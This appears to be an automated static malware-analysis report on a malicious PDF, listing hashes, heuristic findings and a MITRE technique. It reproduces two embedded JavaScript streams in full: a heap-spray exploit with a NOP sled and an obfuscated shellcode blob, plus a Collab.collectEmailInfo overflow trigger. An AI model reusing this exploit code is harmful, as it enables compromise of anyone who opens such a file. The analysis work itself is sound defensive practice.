Malicious PDF — malware analysis report

Static analysis result for SHA-256 af5c075fff86ba66…

MALICIOUS

PDF

1.5 KB First seen: 2026-05-10
MD5: 888a351a539022f40b5e425b8642d1d3 SHA-1: e5d4723a949524e730c924a1393a6760d8bac964 SHA-256: af5c075fff86ba66e189cb8bfd42f9a5b1b169ddb838498b5fe90eeda3a8be2b
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_UNESCAPE'. The JavaScript is likely intended to be executed upon opening the PDF, potentially to download and execute a second-stage payload. The presence of obfuscated scripts and a long encoded blob further supports this. The exact behavior of the script is not fully discernible due to obfuscation, leading to a moderate confidence level.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    return unescape(cmjny);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111111_000.js pdf-javascript-stream PDF /JS object 111111 at offset 0x160 2249 bytes
SHA-256: 2795e016e56758673690f68960b9154ee917c1148b6f2440660d044bc03c0cb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function apera(cmjny)
{
return unescape(cmjny);
}
var fskoi = new Array();
var fvhodo = 'ARG0c0cARG0c0c'.replace(/ARG/igm,'%u');
var izapbs = 'ARG9090ARG9090'.replace(/ARG/igm,'%u');
var kogqa = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ612FZ6C6CZ6261Z753XZ6274Z6E61Z2E6BZ6F63Z2F6DZ7X65Z6C2FZ7X2EZ7X68Z693FZ343DZ9XXX'.replace(/Z/igm,'%u').replace(/X/igm,'0');
fvhodo=apera(fvhodo);
izapbs=apera(izapbs);
kogqa=apera(kogqa);
while (izapbs.length * 2 < 0x3fffc8-kogqa.length * 2){izapbs += izapbs;}
izapbs = izapbs.substr(0, (0x3fffc8-kogqa.length * 2) / 2);
for (var xrjng = 0; xrjng < 47; xrjng ++ ){fskoi[xrjng] = izapbs + kogqa;}
while (fvhodo.length < 44952){fvhodo += fvhodo;}
javascript_obj111112_001.js pdf-javascript-stream PDF /JS object 111112 at offset 0x569 66 bytes
SHA-256: d4267e7b3b627634461a9847f764ad3b18a5d30340bb0262a45574fc9d9d4783
Preview script
First 1,000 lines of the extracted script
this.collabStore = Collab.collectEmailInfo({subj:"", msg:fvhodo});

Open this report in the interactive analyzer, or submit your own file for analysis.